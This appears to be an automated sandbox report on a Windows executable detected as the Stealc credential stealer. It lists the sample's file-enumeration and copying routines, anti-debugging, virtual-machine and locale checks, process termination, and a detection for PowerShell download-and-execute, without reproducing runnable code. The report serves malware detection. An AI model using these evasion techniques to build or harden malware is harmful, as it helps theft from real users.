Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 8WOUWb5iEv.exe	ReversingLabs: Detection: 42%
Source: 8WOUWb5iEv.exe	Virustotal: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\8WOUWb5iEv.exe "C:\Users\user\Desktop\8WOUWb5iEv.exe"
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1052

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: my_library.pdbU source: 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: 8WOUWb5iEv.exe, 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Unpacked PE file: 0.2.8WOUWb5iEv.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Unpacked PE file: 0.2.8WOUWb5iEv.exe.400000.1.unpack

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00419F20

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0041B335 push ecx; ret	0_2_0041B348
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0086241D push 7D7C6160h; retf	0_2_00862422
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02479280 push ecx; ret	0_2_02479293
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0240B59C push ecx; ret	0_2_0240B5AF

Source: 8WOUWb5iEv.exe

Static PE information: section name: .text entropy: 7.618486265802441

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

0_2_00419F20

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-44687

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Evaded block: after key decision

graph_0-45847

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

API coverage: 6.7 %

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02404357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_02404357
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FC0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_023FC0A7
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FF087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_023FF087
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FE177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_023FE177
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FE797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_023FE797
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FFA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_023FFA17
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02404A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_02404A27
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023F1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_023F1977
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02403D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_02403D67
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02404DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02404DC7
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FDDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_023FDDE7

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_00401160 GetSystemInfo,ExitProcess,

0_2_00401160

Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHH
Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	API call chain: ExitProcess graph end node	graph_0-44694
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	API call chain: ExitProcess graph end node	graph_0-44675
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	API call chain: ExitProcess graph end node	graph_0-44686
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	API call chain: ExitProcess graph end node	graph_0-44672
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	API call chain: ExitProcess graph end node	graph_0-44715
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	API call chain: ExitProcess graph end node	graph_0-44693
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	API call chain: ExitProcess graph end node	graph_0-44514
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	API call chain: ExitProcess graph end node	graph_0-44560

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041B058

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000

0_2_00404610

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

0_2_00419F20

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]	0_2_00419AA0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00860083 push dword ptr fs:[00000030h]	0_2_00860083
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023F092B mov eax, dword ptr fs:[00000030h]	0_2_023F092B
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02409D07 mov eax, dword ptr fs:[00000030h]	0_2_02409D07
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023F0D90 mov eax, dword ptr fs:[00000030h]	0_2_023F0D90

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004179E0

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041B058
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0041D21A SetUnhandledExceptionFilter,	0_2_0041D21A
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041B63A
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0240B2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0240B2BF
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0240D481 SetUnhandledExceptionFilter,	0_2_0240D481
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0240B8A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0240B8A1

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 8WOUWb5iEv.exe PID: 6720, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,	0_2_004198E0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_00419790
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02409B47 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,	0_2_02409B47
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_024099F7 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_024099F7

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_02436A0F cpuid

0_2_02436A0F

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_00417D20
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_02407F87

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_00418CF0 GetSystemTime,

0_2_00418CF0

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004179E0

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00417BC0

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

